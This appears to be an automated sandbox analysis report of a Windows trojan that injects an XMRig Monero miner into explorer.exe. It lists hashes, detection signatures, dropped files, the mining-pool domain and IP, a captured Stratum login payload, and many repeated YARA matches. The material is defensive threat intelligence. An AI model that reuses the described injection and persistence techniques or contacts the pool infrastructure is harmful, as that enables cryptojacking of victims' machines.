Windows Analysis Report pcNCraWcRk

Overview

General Information

Sample Name: pcNCraWcRk (renamed file extension from none to exe)
Analysis ID: 513056
MD5: 0958fa69ba0e6645c42215c5325d8f76
SHA1: 800666827e118ce78aef55c47864512ef9d3b7a6
SHA256: 1b0c9f3f22d25cd518e480798ee44e8876107b2d37b2e92997c039d4a6c69db1
Tags: exetrojan

Detection

BitCoin Miner Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected BitCoin Miner
Sigma detected: Xmrig
Writes to foreign memory regions
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Detected Stratum mining protocol
Allocates memory in foreign processes
Injects a PE file into a foreign process
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number, etc.) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates driver files
Dropped file seen in connection with other malware
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: pcNCraWcRk.exe Virustotal: Detection: 64%
Source: pcNCraWcRk.exe Metadefender: Detection: 31%
Source: pcNCraWcRk.exe ReversingLabs: Detection: 81%
Antivirus / Scanner detection for submitted sample
Source: pcNCraWcRk.exe Avira: detected
Multi AV Scanner detection for domain / URL
Source: xmr.givemexyz.in Virustotal: Detection: 15%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Avira: detection malicious, Label: TR/Agent.ywcqa
Source: C:\Users\user\AppData\Local\Temp\services64.exe Avira: detection malicious, Label: TR/Agent.wbqui
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\services64.exe Virustotal: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\services64.exe Metadefender: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\services64.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Metadefender: Detection: 48%
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe ReversingLabs: Detection: 82%

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner
Yara detected BitCoin Miner
Source: Yara match File source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp String found in binary or memory: FileDescriptionXMRig miner.
Detected Stratum mining protocol
Source: global traffic TCP traffic: 192.168.2.4:49763 -> 198.23.214.117:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.23.214.117 144
Source: C:\Windows\explorer.exe Domain query: xmr.givemexyz.in
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49763 -> 198.23.214.117:8080
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: conhost.exe, 00000001.00000002.685200138.0000025F60DC1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown DNS traffic detected: queries for: xmr.givemexyz.in

System Summary:

Malicious sample detected (through community Yara rule)
Yara signature match
Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
